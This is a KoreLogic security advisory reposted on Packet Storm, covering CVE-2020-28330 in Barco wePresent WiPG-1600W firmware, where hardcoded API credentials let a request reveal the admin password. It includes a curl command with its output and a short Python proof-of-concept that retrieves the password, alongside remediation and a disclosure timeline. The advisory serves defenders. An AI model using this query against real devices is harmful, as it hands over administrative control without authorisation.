exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Barco wePresent Admin Credential Exposure

Barco wePresent Admin Credential Exposure
Posted Nov 20, 2020
Authored by Jim Becher | Site korelogic.com

An attacker armed with hardcoded API credentials from KL-001-2020-004 (CVE-2020-28329) can issue an authenticated query to display the admin password for the main web user interface listening on port 443/tcp for Barco wePresent WiPG-1600W version 2.5.1.8.

tags | exploit, web, tcp
advisories | CVE-2020-28329, CVE-2020-28330
SHA-256 | d17ea5576bc764da9307b56d3e500fe6c4d6a46a6d607ac07eeebd256034d86c

Barco wePresent Admin Credential Exposure

Change Mirror Download
KL-001-2020-005 : Barco wePresent Admin Credentials Exposed In Plain-text

Title: Barco wePresent Admin Credentials Exposed In Plain-text
Advisory ID: KL-001-2020-005
Publication Date: 2020.11.20
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-005.txt


1. Vulnerability Details

Affected Vendor: Barco
Affected Product: wePresent WiPG-1600W
Affected Version: 2.5.1.8
Platform: Embedded Linux
CWE Classification: CWE-523: Unprotected Transport of Credentials
CVE ID: CVE-2020-28330


2. Vulnerability Description

An attacker armed with hardcoded API credentials from
KL-001-2020-004 (CVE-2020-28329) can issue an authenticated
query to display the admin password for the main web user
interface listening on port 443/tcp.


3. Technical Description

An authenticated request using the hardcoded credentials in
KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0
will display the current admin password in clear text. An
attacker will now have the admin password on the device, and
can use the web interface to make any configuration changes
to the device using the web UI.

$ curl -k -u 'admin:[REDACTED]'
https://192.168.2.200:4001/w1.0 { "status": 200, "message":
"Get successful", "data": { "key": "/w1.0", "value": {
"ClientAccess":{
"EnableAirplay": true
}, "Configuration":{
"RestartSystem": false, "ShutdownSystem": false,
"SetAction": "NoAction", "SetActionUrl": ""
}, "DeviceInfo":{
"ArticleNumber": "Barco_Number",
"CurrentUptime": 58524, "InUse": false,
"ModelName": "WiPG-1600", "Sharing": false,
"Status": 0, "StatusMessage": "", "TotalUptime":
473871262, "TotalUsers": 0, "LoginCodeOption":
"Random", "LoginCode": "3746", "SystemPassword":
"W3Pr3s3nt", <- Admin password
... ...


4. Mitigation and Remediation Recommendation

The vendor has released an updated firmware (2.5.3.12) which
remediates the described vulnerability. Firmware and release
notes are available at:

https://www.barco.com/en/support/software/R33050104


5. Credit

This vulnerability was discovered by Jim Becher (@jimbecher) of
KoreLogic, Inc.


6. Disclosure Timeline

2020.08.24 - KoreLogic submits vulnerability details to
Barco.
2020.08.25 - Barco acknowledges receipt and the intention
to investigate.
2020.09.21 - Barco notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline. Barco requests to delay
coordinated disclosure until 2020.12.11.
2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
2020.09.25 - Barco informs KoreLogic of their intent to acquire
CVE number for this vulnerability.
2020.11.09 - Barco shares CVE number with KoreLogic and announces
their intention to release the updated firmware
ahead of schedule, on 2020.11.11. Request that KoreLogic
delay public disclosure until 2020.11.20.
2020.11.11 - Barco firmware release.
2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

The following is a basic Python function to return the admin password:

def get_admin_pw(host, port, adminpw):
apiuser = "admin"
apipw = "[REDACTED]"
url = "https://" + host + ":" + port + "/w1.0"
response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)
dict = response.json()
adminpw = dict['data']['value']['DeviceInfo']['SystemPassword']
return adminpw


The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
https://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close